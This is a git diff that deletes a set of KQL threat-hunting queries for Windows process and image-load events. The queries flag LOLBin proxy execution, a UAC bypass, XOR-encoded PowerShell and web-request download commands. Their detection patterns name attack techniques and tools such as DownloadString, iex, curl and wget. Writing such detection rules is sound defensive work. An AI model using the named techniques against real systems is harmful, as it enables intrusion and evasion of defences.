--- a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael R. (@nahamike01)
-// Date: 2020/03/08
-// Level: high
-// Description: Detects the execution of CSharp interactive console by PowerShell
-// Tags: attack.execution, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql
deleted file mode 100644
index bf07a61d..00000000
--- a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov, Cyb3rEng
-// Date: 2021/08/23
-// Level: high
-// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
-// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql b/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql
deleted file mode 100644
index 11e20190..00000000
--- a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/06/24
-// Level: medium
-// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
-// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003
-DeviceImageLoadEvents
-| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql b/Execution/Suspicious_WindowsTerminal_Child_Processes.kql
deleted file mode 100644
index 04afff03..00000000
--- a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/25
-// Level: medium
-// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
-// Tags: attack.execution, attack.persistence
-DeviceProcessEvents
-| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_WmiPrvSE_Child_Process.kql b/Execution/Suspicious_WmiPrvSE_Child_Process.kql
deleted file mode 100644
index dbebbd92..00000000
--- a/Execution/Suspicious_WmiPrvSE_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects suspicious and uncommon child processes of WmiPrvSE
-// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql
deleted file mode 100644
index f68123c0..00000000
--- a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
-// Date: 2018/09/05
-// Level: medium
-// Description: Detects presence of a potentially xor encoded powershell command
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/Execution/Suspicious_ZipExec_Execution.kql b/Execution/Suspicious_ZipExec_Execution.kql
deleted file mode 100644
index 59378b3b..00000000
--- a/Execution/Suspicious_ZipExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/07
-// Level: medium
-// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/Execution/Sysprep_on_AppData_Folder.kql b/Execution/Sysprep_on_AppData_Folder.kql
deleted file mode 100644
index 285f542e..00000000
--- a/Execution/Sysprep_on_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/06/22
-// Level: medium
-// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe"
\ No newline at end of file
diff --git a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index e0972b4b..00000000
--- a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ)
-// Date: 2024/02/02
-// Level: medium
-// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
-free space, and other disk information. This can be done using the `wmic` command-line utility and has been
-observed being used by threat actors such as Volt Typhoon.
-
-// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Tasks_Folder_Evasion.kql b/Execution/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Execution/Tasks_Folder_Evasion.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql
deleted file mode 100644
index b28bbd12..00000000
--- a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: Detects uncommon child processes of Appvlp.EXE
-Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
-Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
-or to mark a file as a system file.
-
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index 77dfd04d..00000000
--- a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
deleted file mode 100644
index 43fcebb7..00000000
--- a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql b/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql
deleted file mode 100644
index f63cafcb..00000000
--- a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
-// Tags: attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql b/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql
deleted file mode 100644
index baf4a934..00000000
--- a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/21
-// Level: medium
-// Description: Detects suspicious parent process for cmd.exe
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe")
\ No newline at end of file
diff --git a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql b/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql
deleted file mode 100644
index f826a6aa..00000000
--- a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Net.WebClient" or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest"
\ No newline at end of file
diff --git a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
deleted file mode 100644
index 827d695b..00000000
--- a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/Execution/Use_of_FSharp_Interpreters.kql b/Execution/Use_of_FSharp_Interpreters.kql
deleted file mode 100644
index ca9448e4..00000000
--- a/Execution/Use_of_FSharp_Interpreters.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/02
-// Level: medium
-// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe"
-Both can be used for AWL bypass and to execute F# code via scripts or inline.
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe"))
\ No newline at end of file
diff --git a/Execution/Use_of_OpenConsole.kql b/Execution/Use_of_OpenConsole.kql
deleted file mode 100644
index 319b54f3..00000000
--- a/Execution/Use_of_OpenConsole.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal"))
\ No newline at end of file
diff --git a/Execution/Use_of_Pcalua_For_Execution.kql b/Execution/Use_of_Pcalua_For_Execution.kql
deleted file mode 100644
index 0f9642fe..00000000
--- a/Execution/Use_of_Pcalua_For_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2022/06/14
-// Level: medium
-// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe"
\ No newline at end of file
diff --git a/Execution/Use_of_Scriptrunner.exe.kql b/Execution/Use_of_Scriptrunner.exe.kql
deleted file mode 100644
index 0c832c20..00000000
--- a/Execution/Use_of_Scriptrunner.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql b/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql
deleted file mode 100644
index a0582a37..00000000
--- a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anton Kutepov, oscd.community
-// Date: 2020/02/05
-// Level: high
-// Description: Detects using SettingSyncHost.exe to run hijacked binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1574.008
-DeviceProcessEvents
-| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
diff --git a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql b/Execution/VBA_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index 44e3afbd..00000000
--- a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: high
-// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/VMToolsd_Suspicious_Child_Process.kql b/Execution/VMToolsd_Suspicious_Child_Process.kql
deleted file mode 100644
index fcf64329..00000000
--- a/Execution/VMToolsd_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: bohops, Bhabesh Raj
-// Date: 2021/10/08
-// Level: high
-// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
deleted file mode 100644
index 76373e3d..00000000
--- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
